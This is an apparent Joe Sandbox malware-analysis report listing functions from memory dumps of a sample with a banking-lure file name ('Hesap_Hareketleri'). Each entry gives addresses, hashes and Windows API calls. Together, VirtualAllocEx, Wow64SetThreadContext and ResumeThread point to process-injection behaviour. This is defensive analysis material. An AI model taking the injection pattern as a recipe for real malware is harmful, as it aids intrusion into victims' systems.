Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f401dcf82dd6e944842c7b13f06bc235b804fb89478e40cef2caa0456153f191
Instruction ID: 97ccae0388967758723c373664682a6adb65aba850a2a9f8ef4acbd51447f6a3
Opcode Fuzzy Hash: f401dcf82dd6e944842c7b13f06bc235b804fb89478e40cef2caa0456153f191
Instruction Fuzzy Hash: D32139B1C003599FDB10CFAAC884AEEFBF5FF48310F50842AE958A7240D7349954DBA1

Function 07B35828 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B358A6

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fccfac29a00bd125a1b35ac24eb2a2b059a1bd90241528d3f92dc518d97af2cf
Instruction ID: ed44ab620326291c6b63e2800a6b673ea8386b7f27c2344ac97cd6eebfe2b272
Opcode Fuzzy Hash: fccfac29a00bd125a1b35ac24eb2a2b059a1bd90241528d3f92dc518d97af2cf
Instruction Fuzzy Hash: 79213AB1D102098FDB10DFAAC8857EEBBF4EF48310F148429D559A7241DB789944CFA1

Function 024FD7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 024FD84F

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d1cc771747e64128a302c05bfd213a324acb4afdf94f48ee34771995b99522a
Instruction ID: 4ba01c1d3f8879418d01b041410908dfff8a9139cffbc362f16b914d11d380ec
Opcode Fuzzy Hash: 9d1cc771747e64128a302c05bfd213a324acb4afdf94f48ee34771995b99522a
Instruction Fuzzy Hash: 8D21B0B5D00249DFDB10CFAAD984ADEBBF8FB48320F14845AE918A3350D374A954DFA5

Function 07B35770 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07B357DA

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d63a7619ab23dcddf0ff431710d1e9d5737159d0dc989c9cc0a272eae3ea024b
Instruction ID: 09650473bbf002a4f9110da8efa60e0c1d34ace866cbcc263cda45376c4365db
Opcode Fuzzy Hash: d63a7619ab23dcddf0ff431710d1e9d5737159d0dc989c9cc0a272eae3ea024b
Instruction Fuzzy Hash: FF118EB59002498FDB20DFA9D8457EEFBF8EF89324F10841AC419A7240CA355944CB95

Function 07B358F8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B3596E

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5413fa010885285ddf329bbfd7d930bda1a6916a7c1dac4a237ad971aac1cf3
Instruction ID: 932f8f341906fcf82f8b8c03262b58ade70bff703ff739bd23a2f06cf232f833
Opcode Fuzzy Hash: c5413fa010885285ddf329bbfd7d930bda1a6916a7c1dac4a237ad971aac1cf3
Instruction Fuzzy Hash: D4119D728002499FDB20CFA9C8446EFFFF5EF88324F14841AD559A7250C7359950CFA1

Function 07B35900 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B3596E

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e3a3c3cc1ca35edea414f48db659c8152c2c4507ed23a86be4c841746701f896
Instruction ID: b45f332af86dfc2aae42d0c70db5190fc567c0ad94510366c4e4886fb8c4c06e
Opcode Fuzzy Hash: e3a3c3cc1ca35edea414f48db659c8152c2c4507ed23a86be4c841746701f896
Instruction Fuzzy Hash: C3117C728002499FDB20CFA9C844ADFFFF5EF48324F148419D519A7250C7359954CFA1

Function 07B35778 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07B357DA

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6c9fc9a7ef560b672a0dd5a1549cddd93d641c3034558b1b3797170f6f910ede
Instruction ID: 778cdc227cb1b39dff010b91a24bebb4aab2876878d17e8ae837181af87fface
Opcode Fuzzy Hash: 6c9fc9a7ef560b672a0dd5a1549cddd93d641c3034558b1b3797170f6f910ede
Instruction Fuzzy Hash: C1113AB1900249CFDB20DFAAC8457DEFBF8EF88324F248419D519A7240CB756944CBA5

Function 07B39DC0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07B39E25

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ef204be62bdd1362307cdb4c330ae7e415fa7a71b8a0511f903c4dd0e1409183
Instruction ID: 5bab6b5397702eaa180621768a13f86c8b31843afc9b657d163de957fadab6e5
Opcode Fuzzy Hash: ef204be62bdd1362307cdb4c330ae7e415fa7a71b8a0511f903c4dd0e1409183
Instruction Fuzzy Hash: 871128B58043599FDB20CF99D944BDEFFF8EB48324F24844AD554A7600C375A584CFA1

Function 024FB500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 024FB566

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e16d9ffbab24d50f3be770726d557cf5f2a95a989ae25636e5f5ef95c9837dc4
Instruction ID: f02a10b16c40a0434a7e49580ffd81355ed200ff7b72006a023090f80241fef3
Opcode Fuzzy Hash: e16d9ffbab24d50f3be770726d557cf5f2a95a989ae25636e5f5ef95c9837dc4
Instruction Fuzzy Hash: 191110B6C00249CFCB20CF9AC944ADEFBF4EB89328F10841AD918B7610C379A545CFA5

Function 07B326B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07B39E25

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 00f922387cbfd61623b408e41af1903910255c95001384f8ffee9754c289519c
Instruction ID: bc5b0e2798e5693f2701fcda0126c3d8b27a37525e6dd95e9f4ccbcb26467c5e
Opcode Fuzzy Hash: 00f922387cbfd61623b408e41af1903910255c95001384f8ffee9754c289519c
Instruction Fuzzy Hash: 2811F5B58043499FDB20DF99C989BDEBBF8EB58314F108459E554A7200C375A944CFA1

Function 0727778F Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 07277810

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_
API String ID: 0-3325533558
Opcode ID: 84bba4dd71a04507a9c2929456fcdb4cc295b32ec3618fbd49b435e5c57db164
Instruction ID: 7d35f3e518eebb9795dc7a79203dff4061ccee6468c9318a1911cfa62deebd96
Opcode Fuzzy Hash: 84bba4dd71a04507a9c2929456fcdb4cc295b32ec3618fbd49b435e5c57db164
Instruction Fuzzy Hash: 4971B134B042159FD701AFA4D955BAEBBB2EF88300F1489E9D8859F396CB705D4ACBC1

Function 072777C8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 07277810

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_
API String ID: 0-3325533558
Opcode ID: e0d124d548da3a1ad1c380b8abc68d25eb7c9648780ad2f3192b0e4dfcfd591e
Instruction ID: ce72e17bab8d0d96a54eea343c56c2f294d4df88834d810f056c9255d81831e4
Opcode Fuzzy Hash: e0d124d548da3a1ad1c380b8abc68d25eb7c9648780ad2f3192b0e4dfcfd591e
Instruction Fuzzy Hash: CE617E34B002159FD700AFA4D555BAEBBA2FF88300F1489A9D8955F39ACF706D86CBC1

Function 07272D98 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

(gq, xrefs: 07272F35

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (gq
API String ID: 0-1972435379
Opcode ID: 710b2f84c96b134de8025c81f8df6c289c76b21148e9df2155a30fe1137c7ac2
Instruction ID: a282f1f155f0a1db7ee3edd419a2c612f72a6dc881dbbfc07d63ec313bc8992d
Opcode Fuzzy Hash: 710b2f84c96b134de8025c81f8df6c289c76b21148e9df2155a30fe1137c7ac2
Instruction Fuzzy Hash: BB51ADB1A10205EFDB15DF65D954BAEBBF6EF88700F10882AE406EB290CB749D41CB91

Function 07278E68 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

$cq, xrefs: 07278E7F

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: 69e803d9d11117b24cd2f42c1547c95279376708a734d2c29d84744169b3071c
Instruction ID: 69c1dca4c408a28c23f757d507293caba99c1c743a0754f7453f63bcfb272bf4
Opcode Fuzzy Hash: 69e803d9d11117b24cd2f42c1547c95279376708a734d2c29d84744169b3071c
Instruction Fuzzy Hash: 5D11E1B093D2C1DFC3229664971D2757FA29B43205F1888EBF14ACA182C7BE8841C3A3

Function 0727ED18 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Tecq, xrefs: 0727EEA1

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: 909015d8da9d31ecbe59a41cc30253433f266ced3868ddedc1e9f71980c88cb9
Instruction ID: b6ea7340e1e8caf22fe449f8c9a02cca76aa59c37ae0339561a2e74e13992968
Opcode Fuzzy Hash: 909015d8da9d31ecbe59a41cc30253433f266ced3868ddedc1e9f71980c88cb9
Instruction Fuzzy Hash: 9821A8B4E146588BDB08DFEAC9446AEFFF6AF89300F14806AD419AB354DB741905CB91

Function 0727B8E8 Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

3, xrefs: 0727B8CC

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 63568af2699196c0dcc0b2dcc0d1c445c5ece19ffbb435184d51e99914da0c1b
Instruction ID: 420776755f9b6880d1892d875a7aa8f3b72febdf7f331777b0b8ee6da25d9f25
Opcode Fuzzy Hash: 63568af2699196c0dcc0b2dcc0d1c445c5ece19ffbb435184d51e99914da0c1b
Instruction Fuzzy Hash: 2F01F4E1E3E28CCFC3128BA0AB551B57FA09B07110F0002CBD8A687252C9B50B00DF63

Function 07277D58 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

W, xrefs: 07277DB4

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 9cb2c20bcfa6d363fb0e0cb9f7f65bbef72aeb1e6c074833245d9cbe65d77600
Instruction ID: 8b036aca699e7e2c981f21670578d4e850bd45c6fec633dee04d738df6b68593
Opcode Fuzzy Hash: 9cb2c20bcfa6d363fb0e0cb9f7f65bbef72aeb1e6c074833245d9cbe65d77600
Instruction Fuzzy Hash: F701F57097C3848FC7029674C5942B97FB29B83309F1480AED0595F686C77A9886CB62

Function 07272AD8 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

Hgq, xrefs: 07272B0B

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: Hgq
API String ID: 0-2103768809
Opcode ID: 0bb1ce70932ad8e04062895f26540443bf694802c4b1f07cc3c5bc7e136324c8
Instruction ID: 1315fdc41d479ef440844833a04600645e95b8bec65f3001967673bdd0749dd1
Opcode Fuzzy Hash: 0bb1ce70932ad8e04062895f26540443bf694802c4b1f07cc3c5bc7e136324c8
Instruction Fuzzy Hash: 68F0CD317002144B8725AF2AA45442FBBDAEFC9660350C82EE54ACB340DE38DD05CBA0

Function 07276D20 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

G, xrefs: 07276D34

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 486713e3ef4ef7687d584cf74f27788d56ec202a0a008b2ff2e8734817df3227
Instruction ID: 5b8184c2d275b4020923aea43b4a63559fcdc106c95a88ba8596576e52ecd361
Opcode Fuzzy Hash: 486713e3ef4ef7687d584cf74f27788d56ec202a0a008b2ff2e8734817df3227
Instruction Fuzzy Hash: 9FD05EB143E285CBC3068FB09B5626CBF309B13204F2805C3C4498B943DB350E29C701

Function 07276D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

G, xrefs: 07276D34

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 312aaccb10b4eec8d8e9c4fc116fe2030970ccbb7ba0a11057caab3ebf2ed2c9
Instruction ID: f4b60a0d662e3ded8600ed864c1d8bcbfec7fa852edbfdb3da7db588c2021c56
Opcode Fuzzy Hash: 312aaccb10b4eec8d8e9c4fc116fe2030970ccbb7ba0a11057caab3ebf2ed2c9
Instruction Fuzzy Hash: F8C012B0438108EBC608CE91DA4662CBBACD702208F100084E80E43600CFB11E209A82

Function 07273498 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f9299ace0f180c1c046c1cdfe28ea40269287c296998f9085223c0393f8013
Instruction ID: c332e6ed08fe57325d25c7d953a4f345b2ee26ca913ca093d2395dee7dcbcde6
Opcode Fuzzy Hash: 24f9299ace0f180c1c046c1cdfe28ea40269287c296998f9085223c0393f8013
Instruction Fuzzy Hash: 6EC1ADF0F21146DFCB15EF64C6486AEBFB2EF45200F5584A9D442AB2A6DB31C865CB81

Function 07270480 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e000f21faf17fb6cb9e17565f2d7f83e9068008f93d6395aaf8fabd4c78b5ef
Instruction ID: 4f1f021ae1b51ba71c81c70e219ccfcc499a6133c1776d2c70f86b5c15add453
Opcode Fuzzy Hash: 9e000f21faf17fb6cb9e17565f2d7f83e9068008f93d6395aaf8fabd4c78b5ef
Instruction Fuzzy Hash: 14F1D871D1061ACBCF10DFA8C954AEDB7B5FF48300F1086A9D959B7214EB70AA89CF90

Function 0727047B Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c197cb078ba09971ea7e74f50d1bbfd703fe771443af775c7e5c0d4e91ba0954
Instruction ID: 15965b6b2f815f3ed4ca7b71fc7ce52cb011036914026b978ffa817841fbbf80
Opcode Fuzzy Hash: c197cb078ba09971ea7e74f50d1bbfd703fe771443af775c7e5c0d4e91ba0954
Instruction Fuzzy Hash: 2BE1C871D1061ACBCF14DFA8C954AEDB7B5FF48300F1086A9D949B7214EB70AA89CF90

Function 07274AA1 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90b5eaa659c249814cc4f5402bf667306caecfbad9267e3c99d019eb335e5e1
Instruction ID: 4cb59e2743d51c42154d54c62c2d0788e4d2dd694d845c7b1ab03dc4bd9a6f31
Opcode Fuzzy Hash: a90b5eaa659c249814cc4f5402bf667306caecfbad9267e3c99d019eb335e5e1
Instruction Fuzzy Hash: DDB1F775910619DFDB10EF68C980AD8FBB5FF49304F05C299E549BB215EB30AA89CF90

Function 07270C38 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f07c2fb1525b778eb14b970ec54b0caf74d54b2a941606cdefb104ba1822846
Instruction ID: 14e5108a4f0ca8fa5a6b90dc4e52d388676faaf82e9c2218431188151adcebab
Opcode Fuzzy Hash: 6f07c2fb1525b778eb14b970ec54b0caf74d54b2a941606cdefb104ba1822846
Instruction Fuzzy Hash: 3B510A75A1060A8FDB14EFA8C9948ADF7B5FF89210B108669D416B7315EB30ED89CB90

Function 07271800 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973a7408078429cbc9d14ddb91fb314f7020a76105b26daf591c25909277230b
Instruction ID: cb233633c7a6e7b3673273d5027dfbfeb426c3be9135c339acae6bb75dfb8fcf
Opcode Fuzzy Hash: 973a7408078429cbc9d14ddb91fb314f7020a76105b26daf591c25909277230b
Instruction Fuzzy Hash: C34190B0B2120ADFEB19CF69D555A6EBBB6EFC5300F144069E402A7384DF30D951CB92

Function 07270E40 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1105001e9069d9714ef664d2937f21bc015dbaa1a38c8f80db24b79e4113e177
Instruction ID: 5d7fc82e541ece1064d5ec959932cdb13cb9450989a15e5c154b8113eb1d2740
Opcode Fuzzy Hash: 1105001e9069d9714ef664d2937f21bc015dbaa1a38c8f80db24b79e4113e177
Instruction Fuzzy Hash: 97518535E10609CFCB00EFA8D9849EDFBB5FF89304F00855AE515AB325EB71A949CB91

Function 07270C29 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048408859bf0d2e7b4fc6d4aae20c02d82870106cd56eb3e95d2efc69420db96
Instruction ID: 482cd6ea9ab58faec2e0afcc22f8745b4335826e191f30ab27384729b5a1460c
Opcode Fuzzy Hash: 048408859bf0d2e7b4fc6d4aae20c02d82870106cd56eb3e95d2efc69420db96
Instruction Fuzzy Hash: 1D414D71A1070A8FCF10DFA4C9945ADF7B1FF89310B158669D416AB315EB34ED89CB80

Function 07279DFC Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19599d4c43e9744d364fac7eda311acdc461c6e554a5f7416d618d0fa8219b1b
Instruction ID: 1dea05b6d34e63b517b530c451d49d9704edeaa75d52f282accaba07310ed1fe
Opcode Fuzzy Hash: 19599d4c43e9744d364fac7eda311acdc461c6e554a5f7416d618d0fa8219b1b
Instruction Fuzzy Hash: 8841B1B0A3420ACFDB158FACCA96BBEB7B1FF41315F40C42AE15697241C775A981CB52

Function 07273493 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a5a70b714217b136a7341ec0ce5bf7593a2cb015c07620f20025d92f6dab51
Instruction ID: fb3abbca51505fd7b7336fbd58625a24714c018f984ab343d7b01c25d346f398
Opcode Fuzzy Hash: 92a5a70b714217b136a7341ec0ce5bf7593a2cb015c07620f20025d92f6dab51
Instruction Fuzzy Hash: 03412CB1F202468FCB14DFA9C698AADBBF2AF8C214F548069E405EB365DB71DC41CB54

Function 07277A46 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce10b230afa38c69d7de2f00899ffb943467eb23f8f1e51576f3382e3f3ade8
Instruction ID: d10e88cdc7ef77f725e671054e0cb2f36b2461792aa38f37e1628db056d1129b
Opcode Fuzzy Hash: cce10b230afa38c69d7de2f00899ffb943467eb23f8f1e51576f3382e3f3ade8
Instruction Fuzzy Hash: 7941AFF1A392918FC7065BB4A92926A7FB1FB86201F1144A7E442C7392CAB44D41C7A2

Function 07271198 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e5086534e76364407b9e0a9beb7137d19241fe87395e13a2251ee438681909
Instruction ID: 282bfdf6623d71f9d03b27ed265c71755a5cbfcf2f02000ab21ff5a5bb798f34
Opcode Fuzzy Hash: 37e5086534e76364407b9e0a9beb7137d19241fe87395e13a2251ee438681909
Instruction Fuzzy Hash: 0731A5B1E20219DFDB14DFA9D9445ADBBB6FFC9300F10822AE401A7364DB709C51CB91

Function 07276B44 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9948bc49355bd4520110eb674321cfbb872163449ff57618abf1f7473d9256
Instruction ID: b2730cbde4a9b76527c9764fe3ac1bca606f93ee3ed64bc9b7765ac2fda76c52
Opcode Fuzzy Hash: ab9948bc49355bd4520110eb674321cfbb872163449ff57618abf1f7473d9256
Instruction Fuzzy Hash: C831F6B0624909CFC705CF58D6957AA7BF1EB86314F14845ED0169B342CB759C82CB91

Function 0727A2E0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332d1846a885d7703ae9c7dcdd98ae8684ef248f07286c58851c89be402b2a0c
Instruction ID: ee38a19f760a82b19aa33daf789150f3a1fddf5c66956d8c0c93405033f7ac7a
Opcode Fuzzy Hash: 332d1846a885d7703ae9c7dcdd98ae8684ef248f07286c58851c89be402b2a0c
Instruction Fuzzy Hash: E33149B29102499FCB10DFA9D984A9EBFF5EB48320F10846AE508A7350D774A954CFA1

Function 0727C308 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

